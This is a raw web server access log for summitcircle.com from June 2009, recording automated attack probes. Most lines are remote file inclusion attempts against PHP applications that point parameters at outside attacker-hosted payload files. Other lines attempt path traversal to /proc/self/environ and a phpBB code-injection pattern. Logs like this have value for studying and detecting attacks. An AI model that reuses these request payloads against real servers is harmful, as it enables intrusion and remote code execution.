216.17.99.13 - - [28/Jun/2009:20:46:46 -0700] "GET //vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:20:46:46 -0700] "GET /logs/access_081201.log%20%20///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
140.239.58.70 - - [28/Jun/2009:20:49:21 -0700] "GET /phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
140.239.58.70 - - [28/Jun/2009:20:49:22 -0700] "GET /logs/access_090222.log%20%20/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
140.239.58.70 - - [28/Jun/2009:20:49:22 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.87.37.130 - - [28/Jun/2009:20:52:09 -0700] "GET /logs/access_090222.log%20%20/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.87.37.130 - - [28/Jun/2009:20:52:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.87.37.130 - - [28/Jun/2009:20:52:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:20:53:58 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:20:54:02 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:54:51 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:54:52 -0700] "GET /logs/access_090119.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:54:59 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:54:59 -0700] "GET /logs/access_090119.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:54:59 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:55:08 -0700] "GET /logs/access_090202.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:55:41 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:55:41 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:55:41 -0700] "GET /logs/access_090119.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:55:46 -0700] "GET /logs/access_090202.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:58:00 -0700] "GET /logs/access_090413.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:58:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:58:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:58:18 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:58:41 -0700] "GET /logs/access_090119.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:58:44 -0700] "GET /logs/access_090202.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:59:34 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:59:35 -0700] "GET /logs/access_090119.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:59:51 -0700] "GET /logs/access_090119.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:59:51 -0700] "GET /logs/access_090202.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:21:00:45 -0700] "GET /logs/access_090413.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:21:00:52 -0700] "GET /logs/access_081201.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:21:01:24 -0700] "GET /logs/access_081201.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:05:52 -0700] "GET /logs/access_090202.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:05:52 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:05:52 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:05:52 -0700] "GET /logs/access_090119.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:09:12 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:09:13 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
62.15.230.250 - - [28/Jun/2009:21:11:20 -0700] "GET /logs/access_090119.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:12:32 -0700] "GET /logs/access_090119.log/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:12:32 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:12:32 -0700] "GET /convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:21:12:33 -0700] "GET /logs/access_090413.log/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:21:12:33 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:12:33 -0700] "GET /logs/access_090406.log/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:21:12:36 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:14:34 -0700] "GET /logs/access_090119.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:14:34 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:14:34 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:14:44 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:15:21 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:15:28 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:16:42 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:51 -0700] "GET /index.phpmain.php?x=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:51 -0700] "GET /logs/index.phpmain.php?x=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:51 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:51 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:52 -0700] "GET /index.phpmain.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:52 -0700] "GET /logs/index.phpmain.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:53 -0700] "GET /index.phpmain.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
203.235.1.115 - - [28/Jun/2009:21:17:53 -0700] "GET /logs/index.phpmain.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:18:06 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:18:06 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:18:47 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:18:47 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:18:47 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:19:03 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:19:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.140.23.185 - - [28/Jun/2009:21:19:03 -0700] "GET /logs/access_090119.log//skin/zero_vote/ask_password.php?dir=http://www.bildpunktlinden.de/cache/mod/mod.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:19:10 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:19:10 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:19:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:19:27 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:19:27 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:19:27 -0700] "GET /logs/access.log%20%20//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:19:31 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:19:31 -0700] "GET /logs/access.log%20%20//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:19:31 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:19:48 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:19:49 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.825" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:19:49 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5808 "-" "libwww-perl/5.825" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:15 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:15 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:15 -0700] "GET /logs/access_090202.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:21 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:28 -0700] "GET /logs/access_090209.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:31 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:31 -0700] "GET /logs/access_090202.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:20:36 -0700] "GET /logs/access_090209.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.198.32.3 - - [28/Jun/2009:21:21:09 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.198.32.3 - - [28/Jun/2009:21:21:09 -0700] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.198.32.3 - - [28/Jun/2009:21:21:09 -0700] "GET /logs/access_081201.log/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:21:24 -0700] "GET /logs/access_090119.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:21:24 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:21:24 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:21:25 -0700] "GET /logs/access_090119.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:21:25 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:21:25 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
